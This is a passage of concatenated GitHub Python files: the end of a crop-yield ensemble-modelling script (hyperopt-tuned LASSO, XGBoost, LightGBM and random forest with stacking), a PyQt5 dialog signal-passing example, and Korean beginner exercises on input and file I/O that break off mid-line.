(trend)\ndata_d['yield_trend'] = 0\nfor s in data_d.State.unique():\n for c in data_d[data_d.State==s].County.unique():\n y1 = pd.DataFrame(data_d.Yield[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n x1 = pd.DataFrame(data_d.Year[(data_d.Year<2018) & ((data_d.State).astype('int') == s) & ((data_d.County).astype('int') == c)])\n regressor = LinearRegression()\n regressor.fit(x1, y1)\n data_d.loc[(data_d.Year<2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(x1)\n if len(data_d.Year[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c)].unique()) != 0:\n data_d.loc[(data_d.Year==2018)&(data_d.State==s)&(data_d.County==c),'yield_trend'] = regressor.predict(pd.DataFrame([2018]))\n\n# Joining the APSIM, soil and progress variables together\ndata = pd.concat([data_d,pd.DataFrame(progress[:,12:25])], axis=1)\ndata = pd.concat([data,pd.DataFrame(soil)],axis=1)\n\n# dropping rows with na values (years before 1984)\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n\n# renaming columns\nprogress_names = ['Progress_' + str(i) for i in range(1,14)]\nsoil_names = ['Soil_' + str(i) for i in range(1,181)]\nnames = [progress_names, soil_names]\nnames = [item for sublist in names for item in sublist]\ncol_names = data.columns.values\ncol_names[1:4] = ['year', 'state', 'county']\ncol_names[28:] = names\ndata.columns = col_names\n\n# Joining weather variables\ndata = pd.merge(data, weather , on=['year','state','county'])\n\n# Scaling the variables\ndata = data.rename(columns = {'year':'Year'})\ncolumns_to_scale = data.drop(columns=['Yield','Year','state','county']).columns.values\nscaler = MinMaxScaler()\nscaled_columns = scaler.fit_transform(data[columns_to_scale])\nscaled_columns = pd.DataFrame(scaled_columns, columns=columns_to_scale)\n\ndata2 = pd.DataFrame(data.Yield)\ndata = pd.concat([data2, data.Year, scaled_columns], axis=1)\n\n# Splitting the data set to test and train\ntest = data[data.Year==2018]\ntrain = data[data.Year!=2018]\n\nx_test = test.drop(columns=['Yield'])\ny_test = test.Yield\n\nX = train.drop(columns=['Yield'])\nX = X.reset_index(drop=True)\nY = train.Yield\nY.reset_index(inplace=True, drop=True)\n\n\n# feature selection with random forest\nrf = RandomForestRegressor(n_estimators=100)\nrf.fit(X, Y)\n\nfrom eli5.sklearn import PermutationImportance\n\nperm = PermutationImportance(rf, cv=cv, n_iter=10).fit(X, Y)\nfeature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\nfeature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\nselected_features = feature_importances.iloc[0:80,:][0]\nif np.isin('Year', selected_features)==False:\n selected_features = selected_features.append(pd.Series('Year'))\nX = X.loc[:,selected_features]\nx_test = x_test.loc[:,selected_features]\nselected_features.to_csv('RF_features_2018.csv')\n\n\n# CV\nkf = KFold(cv)\n\n\n\n ## ---------------- Bayesian Search ---------------- ##\n\n\nmax_evals = 20\n\ndef objective_LASSO(params):\n LASSO_df_B = pd.DataFrame()\n L1_B = Lasso()\n for train_index, test_index in kf.split(X):\n LASSO_B = L1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df_B = pd.concat([LASSO_df_B, pd.DataFrame(LASSO_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LASSO = mse(data_d.Yield[(data_d.Year < 2018)], LASSO_df_B)\n return {'loss': loss_LASSO, 'params': params, 'status': STATUS_OK}\n\nspace_LASSO = {'alpha': hp.uniform('alpha', 10**-5, 1)}\ntpe_algorithm = tpe.suggest\ntrials_LASSO = Trials()\nbest_LASSO = fmin(fn=objective_LASSO, space=space_LASSO, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LASSO, rstate=np.random.RandomState(1369))\nLASSO_param_B = pd.DataFrame({'alpha': []})\nfor i in range(max_evals):\n LASSO_param_B.alpha[i] = trials_LASSO.results[i]['params']['alpha']\nLASSO_param_B = pd.DataFrame(LASSO_param_B.alpha)\n\n\n\ndef objective_XGB(params):\n XGB_df_B = pd.DataFrame()\n X1_B = XGBRegressor(objective='reg:squarederror', **params)\n for train_index, test_index in kf.split(X):\n XGB_B = X1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df_B = pd.concat([XGB_df_B, pd.DataFrame(X1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_XGB = mse(data_d.Yield[(data_d.Year < 2018)], XGB_df_B)\n return {'loss': loss_XGB, 'params': params, 'status': STATUS_OK}\n\nspace_XGB = {'gamma': hp.uniform('gamma', 0, 1),\n 'learning_rate': hp.uniform('learning_rate', 0.001, 0.5),\n 'n_estimators': hp.choice('n_estimators', [100, 300, 500, 1000]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(3, 20, 1)])}\ntpe_algorithm = tpe.suggest\ntrials_XGB = Trials()\nbest_XGB = fmin(fn=objective_XGB, space=space_XGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_XGB, rstate=np.random.RandomState(1369))\nXGB_param_B = pd.DataFrame({'gamma': [], 'learning_rate': [], 'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n XGB_param_B.gamma[i] = trials_XGB.results[i]['params']['gamma']\n XGB_param_B.learning_rate[i] = trials_XGB.results[i]['params']['learning_rate']\n XGB_param_B.n_estimators[i] = trials_XGB.results[i]['params']['n_estimators']\n XGB_param_B.max_depth[i] = trials_XGB.results[i]['params']['max_depth']\nXGB_param_B = pd.DataFrame({'gamma': XGB_param_B.gamma,\n 'learning_rate': XGB_param_B.learning_rate,\n 'n_estimators': XGB_param_B.n_estimators,\n 'max_depth': XGB_param_B.max_depth})\n\n\ndef objective_LGB(params):\n LGB_df_B = pd.DataFrame()\n G1_B = LGBMRegressor(objective='regression', **params)\n for train_index, test_index in kf.split(X):\n LGB_B = G1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df_B = pd.concat([LGB_df_B, pd.DataFrame(G1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_LGB = mse(data_d.Yield[(data_d.Year < 2018)], LGB_df_B)\n return {'loss': loss_LGB, 'params': params, 'status': STATUS_OK}\n\nspace_LGB = {'num_leaves': hp.choice('num_leaves', [int(x) for x in np.arange(5, 40, 2)]),\n 'learning_rate': hp.uniform('learning_rate', 0.1, 0.5),\n 'n_estimators': hp.choice('n_estimators', [500, 1000, 1500, 2000])}\ntpe_algorithm = tpe.suggest\ntrials_LGB = Trials()\nbest_LGB = fmin(fn=objective_LGB, space=space_LGB, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_LGB, rstate=np.random.RandomState(1369))\nLGB_param_B = pd.DataFrame({'num_leaves': [], 'learning_rate': [], 'n_estimators': []})\nfor i in range(max_evals):\n LGB_param_B.num_leaves[i] = trials_LGB.results[i]['params']['num_leaves']\n LGB_param_B.learning_rate[i] = trials_LGB.results[i]['params']['learning_rate']\n LGB_param_B.n_estimators[i] = trials_LGB.results[i]['params']['n_estimators']\nLGB_param_B = pd.DataFrame({'num_leaves': LGB_param_B.num_leaves,\n 'learning_rate': LGB_param_B.learning_rate,\n 'n_estimators': LGB_param_B.n_estimators})\n\n\ndef objective_RF(params):\n RF_df_B = pd.DataFrame()\n R1_B = RandomForestRegressor(**params)\n for train_index, test_index in kf.split(X):\n RF_B = R1_B.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df_B = pd.concat([RF_df_B, pd.DataFrame(R1_B.predict(np.array(X.drop(columns='Year'))[test_index]))])\n loss_RF = mse(data_d.Yield[(data_d.Year < 2018)], RF_df_B)\n return {'loss': loss_RF, 'params': params, 'status': STATUS_OK}\n\nspace_RF = {'n_estimators': hp.choice('n_estimators', [100, 200, 300, 500]),\n 'max_depth': hp.choice('max_depth', [int(x) for x in np.arange(5, 41, 5)])}\ntpe_algorithm = tpe.suggest\ntrials_RF = Trials()\nbest_RF = fmin(fn=objective_RF, space=space_RF, algo=tpe.suggest,\n max_evals=max_evals, trials=trials_RF, rstate=np.random.RandomState(1369))\nRF_param_B = pd.DataFrame({'n_estimators': [], 'max_depth': []})\nfor i in range(max_evals):\n RF_param_B.n_estimators[i] = trials_RF.results[i]['params']['n_estimators']\n RF_param_B.max_depth[i] = trials_RF.results[i]['params']['max_depth']\nRF_param_B = pd.DataFrame({'n_estimators': RF_param_B.n_estimators,\n 'max_depth': RF_param_B.max_depth})\n\n\n## ---------------- Permutation feature importance ---------------- ##\n\n\ndef perm_fi(model, cv, n_iter):\n perm = PermutationImportance(model, cv=cv, n_iter=n_iter).fit(X.drop(columns='Year'), Y)\n feature_importances = [(feature, importance) for feature, importance in zip(list(X.columns), list(np.abs(perm.feature_importances_)))]\n feature_importances = pd.DataFrame(sorted(feature_importances, key = lambda x: x[1], reverse = True))\n return feature_importances\n\n\n## ---------------- Building models ---------------- ##\nLASSO_df2 = pd.DataFrame()\nL2 = Lasso(alpha=trials_LASSO.best_trial['result']['params']['alpha'], random_state=1369)\nfor train_index, test_index in kf.split(X):\n L2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LASSO_df2 = pd.concat([LASSO_df2, pd.DataFrame(L2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLASSO_df2 = LASSO_df2.reset_index(drop=True)\nLASSO_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LASSO_df2)\nLASSO = L2.fit(X.drop(columns='Year'), Y)\nLASSO_preds_test2 = LASSO.predict(x_test.drop(columns='Year'))\npd.DataFrame(LASSO_preds_test2).to_csv('LASSO_preds_test_2018.csv')\nLASSO_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LASSO_preds_test2)\nLASSO_rmse_test2 = np.sqrt(LASSO_mse_test2)\nLASSO_preds_train = LASSO.predict(X.drop(columns='Year'))\npd.DataFrame(LASSO_preds_train).to_csv('LASSO_preds_train_2018.csv')\nLASSO_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LASSO_preds_train))\nfeature_importances_lasso = perm_fi(L2, cv, 10)\nfeature_importances_lasso.to_csv('feature_importances_lasso_2018.csv')\n\n\n\n### ---------- XGB ------------ ###\nXGB_df2 = pd.DataFrame()\nX2 = XGBRegressor(objective='reg:squarederror',\n gamma=trials_XGB.best_trial['result']['params']['gamma'],\n learning_rate=trials_XGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_XGB.best_trial['result']['params']['n_estimators']),\n max_depth=int(trials_XGB.best_trial['result']['params']['max_depth']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n X2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n XGB_df2 = pd.concat([XGB_df2, pd.DataFrame(X2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nXGB_df2 = XGB_df2.reset_index(drop=True)\nXGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], XGB_df2)\nXGB = X2.fit(X.drop(columns='Year'), Y)\nXGB_preds_test2 = XGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(XGB_preds_test2).to_csv('XGB_preds_test_2018.csv')\nXGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], XGB_preds_test2)\nXGB_rmse_test2 = np.sqrt(XGB_mse_test2)\nXGB_preds_train = XGB.predict(X.drop(columns='Year'))\npd.DataFrame(XGB_preds_train).to_csv('XGB_preds_train_2018.csv')\nXGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], XGB_preds_train))\nperm_xgb = PermutationImportance(X2, cv=cv, n_iter=10).fit(X.as_matrix(), Y.as_matrix())\nfeature_importances_xgb = [(feature, importance) for feature, importance in\n zip(list(X.columns), list(np.abs(perm_xgb.feature_importances_)))]\nfeature_importances_xgb = pd.DataFrame(sorted(feature_importances_xgb, key=lambda x: x[1], reverse=True))\nfeature_importances_xgb.to_csv('feature_importances_xgb_2018.csv')\n\n\n### ---------- LGB ------------ ###\nLGB_df2 = pd.DataFrame()\nG2 = LGBMRegressor(objective='regression', random_state=1369,\n num_leaves=int(trials_LGB.best_trial['result']['params']['num_leaves']),\n learning_rate=trials_LGB.best_trial['result']['params']['learning_rate'],\n n_estimators=int(trials_LGB.best_trial['result']['params']['n_estimators']))\nfor train_index, test_index in kf.split(X):\n G2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LGB_df2 = pd.concat([LGB_df2, pd.DataFrame(G2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLGB_df2 = LGB_df2.reset_index(drop=True)\nLGB_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LGB_df2)\nLGB = G2.fit(X.drop(columns='Year'), Y)\nLGB_preds_test2 = LGB.predict(x_test.drop(columns='Year'))\npd.DataFrame(LGB_preds_test2).to_csv('LGB_preds_test_2018.csv')\nLGB_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LGB_preds_test2)\nLGB_rmse_test2 = np.sqrt(LGB_mse_test2)\nLGB_preds_train = LGB.predict(X.drop(columns='Year'))\npd.DataFrame(LGB_preds_train).to_csv('LGB_preds_train_2018.csv')\nLGB_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LGB_preds_train))\nfeature_importances_lgb = perm_fi(G2, cv, 10)\nfeature_importances_lgb.to_csv('feature_importances_lgb_2018.csv')\n\n\n### ---------- RF ------------ ###\nRF_df2 = pd.DataFrame()\nR2 = RandomForestRegressor(max_depth=int(trials_RF.best_trial['result']['params']['max_depth']),\n n_estimators=int(trials_RF.best_trial['result']['params']['n_estimators']), random_state=1369)\nfor train_index, test_index in kf.split(X):\n R2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n RF_df2 = pd.concat([RF_df2, pd.DataFrame(R2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nRF_df2 = RF_df2.reset_index(drop=True)\nRF_mse2 = mse(data_d.Yield[(data_d.Year<2018)], RF_df2)\nRF = R2.fit(X.drop(columns='Year'), Y)\nRF_preds_test2 = RF.predict(x_test.drop(columns='Year'))\npd.DataFrame(RF_preds_test2).to_csv('RF_preds_test_2018.csv')\nRF_mse_test2 = mse(data_d.Yield[data_d.Year==2018], RF_preds_test2)\nRF_rmse_test2 = np.sqrt(RF_mse_test2)\nRF_preds_train = RF.predict(X.drop(columns='Year'))\npd.DataFrame(RF_preds_train).to_csv('RF_preds_train_2018.csv')\nRF_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], RF_preds_train))\nfeature_importances_rf = perm_fi(R2, cv, 10)\nfeature_importances_rf.to_csv('feature_importances_rf_2018.csv')\n\n\n### ---------- LR ------------ ###\nLR_df2 = pd.DataFrame()\nlm2 = LinearRegression()\nlm2.fit(X.drop(columns='Year'),Y)\nfor train_index, test_index in kf.split(X):\n lm2.fit(np.array(X.drop(columns='Year'))[train_index], np.array(Y)[train_index])\n LR_df2 = pd.concat([LR_df2, pd.DataFrame(lm2.predict(np.array(X.drop(columns='Year'))[test_index]))])\nLR_df2 = LR_df2.reset_index(drop=True)\nLR_mse2 = mse(data_d.Yield[(data_d.Year<2018)], LR_df2)\nLR = lm2.fit(X.drop(columns='Year'), Y)\nLR_preds_test2 = LR.predict(x_test.drop(columns='Year'))\npd.DataFrame(LR_preds_test2).to_csv('LR_preds_test2_2018.csv')\nLR_mse_test2 = mse(data_d.Yield[data_d.Year==2018], LR_preds_test2)\nLR_rmse_test2 = np.sqrt(LR_mse_test2)\nLR_preds_train = LR.predict(X.drop(columns='Year'))\npd.DataFrame(LR_preds_train).to_csv('LR_preds_train_2018.csv')\nLR_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], LR_preds_train))\nfeature_importances_lr = perm_fi(lm2, cv, 10)\nfeature_importances_lr.to_csv('feature_importances_lr_2018.csv')\n\n\n\n## ---------------- Optimizing Ensembles ---------------- ##\n\ndef objective2(y):\n return mse(data_d.Yield[(data_d.Year<2018)],\n (y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2))\n\ndef constraint12(y):\n return y[0] + y[1] + y[2] + y[3] + y[4] - 1.0\ndef constraint22(y):\n return LASSO_mse2 - objective2(y)\ndef constraint32(y):\n return XGB_mse2 - objective2(y)\ndef constraint42(y):\n return LGB_mse2 - objective2(y)\ndef constraint52(y):\n return RF_mse2 - objective2(y)\ndef constraint62(y):\n return LR_mse2 - objective2(y)\n\n\ny0 = np.zeros(5)\ny0[0] = 1 / 5\ny0[1] = 1 / 5\ny0[2] = 1 / 5\ny0[3] = 1 / 5\ny0[4] = 1 / 5\n\nb = (0, 1.0)\nbnds2 = (b, b, b, b, b)\ncon12 = {'type': 'eq', 'fun': constraint12}\ncon22 = {'type': 'ineq', 'fun': constraint22}\ncon32 = {'type': 'ineq', 'fun': constraint32}\ncon42 = {'type': 'ineq', 'fun': constraint42}\ncon52 = {'type': 'ineq', 'fun': constraint52}\ncon62 = {'type': 'ineq', 'fun': constraint62}\n\ncons2 = [con12, con22, con32, con42, con52, con62]\n\nsolution2 = minimize(objective2, y0, method='SLSQP',\n options={'disp': True, 'maxiter': 3000, 'eps': 1e-3}, bounds=bnds2,\n constraints=cons2)\ny = solution2.x\n\ncowe_preds_test = y[0]*LASSO_preds_test2 + y[1]*XGB_preds_test2 + y[2]*LGB_preds_test2 + y[3]*RF_preds_test2 + y[4]*LR_preds_test2\ncowe_mse_test = mse(data_d.Yield[data_d.Year==2018], cowe_preds_test)\ncowe_rmse_test = np.sqrt(cowe_mse_test)\npd.DataFrame(cowe_preds_test).to_csv('cowe_preds_test_2018.csv')\ncowe_preds_train = y[0]*LASSO_preds_train + y[1]*XGB_preds_train + y[2]*LGB_preds_train + y[3]*RF_preds_train + y[4]*LR_preds_train\npd.DataFrame(cowe_preds_train).to_csv('cowe_preds_train_2018.csv')\ncowe_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cowe_preds_train))\n\n\ncowe_preds_CV = y[0]*LASSO_df2 + y[1]*XGB_df2 + y[2]*LGB_df2 + y[3]*RF_df2 + y[4]*LR_df2\ncowe_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cowe_preds_CV)\ncowe_rmse_CV = np.sqrt(cowe_mse_CV)\n\n\ncls_preds_test = y0[0]*LASSO_preds_test2 + y0[1]*XGB_preds_test2 + y0[2]*LGB_preds_test2 + y0[3]*RF_preds_test2 + y0[4]*LR_preds_test2\ncls_mse_test = mse(data_d.Yield[data_d.Year==2018], cls_preds_test)\ncls_rmse_test = np.sqrt(cls_mse_test)\npd.DataFrame(cls_preds_test).to_csv('cls_preds_test_2018.csv')\ncls_preds_train = y0[0]*LASSO_preds_train + y0[1]*XGB_preds_train + y0[2]*LGB_preds_train + y0[3]*RF_preds_train + y0[4]*LR_preds_train\npd.DataFrame(cls_preds_train).to_csv('cls_preds_train_2018.csv')\ncls_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year<2018], cls_preds_train))\n\n\ncls_preds_CV = y0[0]*LASSO_df2 + y0[1]*XGB_df2 + y0[2]*LGB_df2 + y0[3]*RF_df2 + y0[4]*LR_df2\ncls_mse_CV = mse(data_d.Yield[(data_d.Year<2018)], cls_preds_CV)\ncls_rmse_CV = np.sqrt(cls_mse_CV)\n\n\n\n## -------------------------------- STACKING -------------------------------- ##\n\npredsDF2 = pd.DataFrame()\npredsDF2['LASSO'] = LASSO_df2[0]\npredsDF2['XGB']= XGB_df2[0]\npredsDF2['LGB'] = LGB_df2[0]\npredsDF2['RF'] = RF_df2[0]\npredsDF2['LR'] = LR_df2[0]\npredsDF2['Y'] = data_d.Yield[(data_d.Year < 2018)].reset_index(drop=True)\nx_stacked2 = predsDF2.drop(columns='Y', axis=1)\ny_stacked2 = predsDF2['Y']\ntestPreds2 = pd.DataFrame([LASSO_preds_test2, XGB_preds_test2, LGB_preds_test2, RF_preds_test2, LR_preds_test2]).T\ntestPreds2.columns = ['LASSO', 'XGB', 'LGB', 'RF', 'LR']\n\n\nstck_reg2 = LinearRegression()\nstck_reg2.fit(x_stacked2, y_stacked2)\nstck_reg_preds_test2 = stck_reg2.predict(testPreds2)\nstck_reg_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_reg_preds_test2)\nstck_reg_rmse_test2 = np.sqrt(stck_reg_mse_test2)\npd.DataFrame(stck_reg_preds_test2).to_csv('stck_reg_preds_test_2018.csv')\nstck_reg_preds_train = stck_reg2.predict(x_stacked2)\npd.DataFrame(stck_reg_preds_train).to_csv('stck_reg_preds_train_2018.csv')\nstck_reg_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_reg_preds_train))\n\nstck_lasso2 = Lasso()\nstck_lasso2.fit(x_stacked2, y_stacked2)\nstck_lasso_preds_test2 = stck_lasso2.predict(testPreds2)\nstck_lasso_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lasso_preds_test2)\nstck_lasso_rmse_test2 = np.sqrt(stck_lasso_mse_test2)\npd.DataFrame(stck_lasso_preds_test2).to_csv('stck_lasso_preds_test_2018.csv')\nstck_lasso_preds_train = stck_lasso2.predict(x_stacked2)\npd.DataFrame(stck_lasso_preds_train).to_csv('stck_lasso_preds_train_2018.csv')\nstck_lasso_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lasso_preds_train))\n\nstck_rf2 = RandomForestRegressor()\nstck_rf2.fit(x_stacked2, y_stacked2)\nstck_rf_preds_test2 = stck_rf2.predict(testPreds2)\nstck_rf_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_rf_preds_test2)\nstck_rf_rmse_test2 = np.sqrt(stck_rf_mse_test2)\npd.DataFrame(stck_rf_preds_test2).to_csv('stck_rf_preds_test_2018.csv')\nstck_rf_preds_train = stck_rf2.predict(x_stacked2)\npd.DataFrame(stck_rf_preds_train).to_csv('stck_rf_preds_train_2018.csv')\nstck_rf_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_rf_preds_train))\n\nstck_lgb2 = LGBMRegressor()\nstck_lgb2.fit(x_stacked2, y_stacked2)\nstck_lgb_preds_test2 = stck_lgb2.predict(testPreds2)\nstck_lgb_mse_test2 = mse(data_d.Yield[data_d.Year == 2018], stck_lgb_preds_test2)\nstck_lgb_rmse_test2 = np.sqrt(stck_lgb_mse_test2)\npd.DataFrame(stck_lgb_preds_test2).to_csv('stck_lgb_preds_test_2018.csv')\nstck_lgb_preds_train = stck_lgb2.predict(x_stacked2)\npd.DataFrame(stck_lgb_preds_train).to_csv('stck_lgb_preds_train_2018.csv')\nstck_lgb_rmse_train = np.sqrt(mse(data_d.Yield[data_d.Year < 2018], stck_lgb_preds_train))\n\n\n\n## -------------------------- RESULTS -------------------------- ##\n\n\ntest_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_test2], 'XGB':[XGB_rmse_test2], 'LGB':[LGB_rmse_test2],\n 'RF': [RF_rmse_test2], 'LR': [LR_rmse_test2],\n 'COWE': [cowe_rmse_test], 'Classical': [cls_rmse_test],\n 'stck_reg': [stck_reg_rmse_test2], 'stck_lasso': [stck_lasso_rmse_test2],\n 'stck_rf': [stck_rf_rmse_test2], 'stck_lgb': [stck_lgb_rmse_test2]})\n\ntrain_results = pd.DataFrame(data={'model':['RMSE'],'LASSO':[LASSO_rmse_train], 'XGB':[XGB_rmse_train], 'LGB':[LGB_rmse_train],\n 'RF': [RF_rmse_train], 'LR': [LR_rmse_train],\n 'COWE': [cowe_rmse_train], 'Classical': [cls_rmse_train],\n 'stck_reg': [stck_reg_rmse_train], 'stck_lasso': [stck_lasso_rmse_train],\n 'stck_rf': [stck_rf_rmse_train], 'stck_lgb': [stck_lgb_rmse_train]})\n\nCV_results = pd.DataFrame(data={'model':['RMSE'], 'LASSO':[np.sqrt(LASSO_mse2)], 'XGB':[np.sqrt(XGB_mse2)],\n 'LGB':[np.sqrt(LGB_mse2)], 'RF': [np.sqrt(RF_mse2)], 'LR': [np.sqrt(LR_mse2)],\n 'COWE': [cowe_rmse_CV],\n 'Classical':[cls_rmse_CV]})\n\ntest_results.to_csv('2018_test.csv')\ntrain_results.to_csv('2018_train.csv')\nCV_results.to_csv('2018_CV.csv')\n","repo_name":"mohsenshahhosseini/Coupling-ML-with-Crop-Modeling","sub_path":"2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":27304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21843902901","text":"# -*- coding: utf-8 -*-\n\n'''\n 【简介】\n 对话框关闭时返回值给主窗口例子\n'''\n\nimport sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom DateDialog2 import DateDialog\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowTitle('信号与槽传递参数的示例')\n\n self.open_btn = QPushButton('获取时间')\n self.lineEdit_inner = QLineEdit(self)\n self.lineEdit_emit = QLineEdit(self)\n self.open_btn.clicked.connect(self.openDialog)\n\n self.lineEdit_inner.setText('接收子窗口内置信号的时间')\n self.lineEdit_emit.setText('接收子窗口自定义信号的时间')\n\n grid = QGridLayout()\n grid.addWidget(self.lineEdit_inner)\n grid.addWidget(self.lineEdit_emit)\n\n grid.addWidget(self.open_btn)\n self.setLayout(grid)\n\n def openDialog(self):\n dialog = DateDialog(self)\n '''连接子窗口的内置信号与主窗口的槽函数'''\n dialog.datetime_inner.dateTimeChanged.connect(self.deal_inner_slot)\n '''连接子窗口的自定义信号与主窗口的槽函数'''\n dialog.Signal_OneParameter.connect(self.deal_emit_slot)\n dialog.show()\n\n def deal_inner_slot(self, date):\n self.lineEdit_inner.setText(date.toString())\n\n\n def deal_emit_slot(self, dateStr):\n self.lineEdit_emit.setText(dateStr)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"cxinping/PyQt5","sub_path":"Chapter07/transParam/CallDialogMainWin2.py","file_name":"CallDialogMainWin2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":2140,"dataset":"github-code","pt":"16"} +{"seq_id":"14964349050","text":"#Q1\n#주어진 자연수가 홀수인지 짝수인지 판별해 주는 함수(is_odd)를 작성해 보자.\ndef Q1():\n a = input(\"정수를 입력하세요\\n:\")\n a = int(a)\n if a % 2 == 1:\n print(\"홀수 입니다.\")\n else:\n print(\"짝수입니다.\")\n\n\n#Q2\n#입력으로 들어오는 모든 수의 평균 값을 계산해 주는 함수를 작성해 보자. (단 입력으로 들어오는 수의 개수는 정해져 있지 않다.)\n#※ 평균 값을 구할 때 len 함수를 사용해 보자.\n\ndef q2_input(): #input을 받아 리스트 형태로 li에 저장\n li = []\n i = 1\n while i != 100:\n b = int(input(\"정수를 입력하세요. (0을 입력하면 입력이 종료 됩니다.):\"))\n if b == 0: #input이 0 이라면 종료\n break\n else: #input이 정수라면 li에 추가\n li.append(b)\n return li\n\ndef q2_calculate(li): #리스트 li를 매개변수로 받아옴\n total = 0\n for c in li: #리스트의 원자를 하나씩 추출하여 total에 저장\n total = c + total\n avg = total / len(li)\n print(\"총 합은 :\\n\", total)\n print(\"평균은 :\")\n return avg\n\ndef Q2():\n li = q2_input()\n result = q2_calculate(li)\n print(result)\n return result\n\n#Q3\n#다음은 두 개의 숫자를 입력받아 더하여 돌려주는 프로그램이다.#이 프로그램을 수행해 보자.\n#첫번째 숫자를 입력하세요:3\n#두번째 숫자를 입력하세요:6\n#두 수의 합은 36 입니다\n#3과 6을 입력했을 때 9가 아닌 36이라는 결괏값을 돌려주었다. 이 프로그램의 오류를 수정해 보자.\n#※ int 함수를 사용해 보자.\ndef Q3():\n input1 = int(input(\"첫번째 숫자를 입력하세요:\"))\n input2 = int(input(\"두번째 숫자를 입력하세요:\"))\n total = input1 + input2\n print(\"두 수의 합은 %s 입니다\" % total)\n\n#Q4\n#다음 중 출력 결과가 다른 것 한 개를 골라 보자.\n#답 3번\ndef Q4():\n print(\"you\" \"need\" \"python\") #youneedpython\n print(\"you\"+\"need\"+\"python\") #youneedpython\n print(\"you\", \"need\", \"python\") #you need python\n print(\"\".join([\"you\", \"need\", \"python\"])) #youneedpython\n\n#Q5\n#다음은 \"test.txt\"라는 파일에 \"Life is too short\" 문자열을 저장한 후 다시 그 파일을 읽어서 출력하는 프로그램이다.\n#이 프로그램은 우리가 예상한 \"Life is too short\"라는 문장을 출력하지 않는다. 우리가 예상한 값을 출력할 수 있도록 프로그램을 수정해 보자.\n\n#답 : f1을 열어주고 닫는 구문이 없었음\ndef Q5():\n f1 = open(\"test.txt\", 'w')\n f1.write(\"Life is too short\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n\n#Q6\n#사용자의 입력을 파일(test.txt)에 저장하는 프로그램을 작성해 보자. (단 프로그램을 다시 실행하더라도 기존에 작성한 내용을 유지하고 새로 입력한 내용을 추가해야 한다.)\ndef Q6():\n while True:\n a = input(\"텍스트 작성 : \")\n if a == '':\n print(\"종료\")\n break\n f1 = open(\"test.txt\", 'a')\n f1.write(a+\"\\n\")\n f1.close() #답 : 이 행을 추가\n f2 = open(\"test.txt\", 'r')\n print(f2.read())\n\n\n#Q7\n#다음과 같은 내용을 지닌 파일 test.txt가 있다. 이 파일의 내용 중 \"java\"라는 문자열을 \"python\"으로 바꾸어서 저장해 보자.\n#※ replace 함수를 사용해 보자.\n#Life is too short\n#you need java\ndef Q7():\n f = open('test.txt', 